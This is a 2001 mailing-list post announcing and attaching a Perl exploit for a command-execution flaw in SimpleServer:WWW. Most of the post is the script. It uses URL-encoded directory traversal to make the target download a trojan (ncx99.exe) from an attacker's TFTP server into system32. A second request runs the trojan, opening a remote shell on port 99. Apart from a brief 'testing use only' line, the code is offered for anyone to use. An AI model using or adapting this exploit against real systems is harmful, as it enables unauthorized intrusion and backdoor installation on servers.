SimpleServer:WWW Command Execution Vulnerability Exploit Code Released
Date: Fri, 27 Jul 2001 10:42:05 +0000
From: "Thran ." <thran60@hotmail.com>
To: bugtraq@securityfocus.com
Subject: SimpleServer:WWW Command Execution Vulnerability Exploit Code Released
------=_NextPart_000_24d9_74ef_3910
Content-Type: text/plain; format=flowed
I coded an exploit for the SimpleServer Command Execution Vulnerability
found earlier. It uploads a trojan and executes it.
Regards,
thran,
www.cdlni.com
<HTML>
<Body>
<font face="comic sans,helvetica,arial" size=2 color=
"#0000FF"><B>John</B></font>
<BR><font face="comic sans,helvetica,arial" size=1 color= "#871F78"><B><I>So
we row on, boats against the current.</I> --F. Scott Fitzgerald</B></font>
</Body>
</HTML>
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
------=_NextPart_000_24d9_74ef_3910
Content-Type: text/plain; name="ssexploit.pl"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="ssexploit.pl"
# SimpleServer:WWW Command Execution Vulnerability
# CODED BY THRAN
# CDLNI 2001
# www.cdlni.com
# You may distribute this code freely
# Iam in no way responsible for this code, its for testing use only
# This script uploads ncx99.exe to the target server and executes it
# simply telnet to target computer on port 99 after executing the trojan
# You need a tftp server listening on a remote computer
# ncx99.exe needs to be in the base dir of the tftp server
# <<<<<DO NOT FORGET TO ENTER A TFTP SERVER INSIDE THIS SCRIPT! :) >>>>>>
(yes including the () part :) )
# Greetz go out to Zerostealth, Creeping Death, Hellb0und, Shell (Warezd00d
:) ) Kim Lloyd, and all my other buds
# btw, dont bug me with my sloppy coding, and dont even ask me why I had to
create 2 socket handlers :/
# bye, have fun
#!/usr/bin/perl
use IO::Socket;
print "Enter server IP:";
$server=<STDIN>;
endl;
print "Enter remote port:";
$port=<STDIN>;
endl;
print "Uploading file... this may take a minute";
endl;
endl;
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server,
PeerPort=>$port, Reuse=>1)
or die "Can't connect to \"$server\"\n";
$remote->autoflush(1);
# Here we write the actual HTTP request to the server, had to encode the
entire url
$url="GET
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Ftftp%20-i%20(ENTER
THE IP OF A TFTP SERVER
HERE)%20GET%20ncx99.exe%20c%3a%5c%5cwinnt%5c%5csystem32%5c%5cblab%2eexe
HTTP/1.0 \n\n";
print $url;
print $remote $url;
# receive everything the server sends and print it to the screen
while (<$remote>) { print }
close $remote;
endl;
endl;
endl;
print "Executing the trojan... If the screen seems to hang, the trojan
should work";
$remote2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server,
PeerPort=>$port, Reuse=>1)
or die "Can't connect to \"$server\"\n";
$remote2->autoflush(1);
#Simply executing the trojan, of course the entire url is still encrypted :)
print $remote2 "GET
/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fblab
HTTP/1.0 \n\n";
# receive everything the server sends and print it to the screen
while (<$remote2>) { print }
close $remote2;
------=_NextPart_000_24d9_74ef_3910--
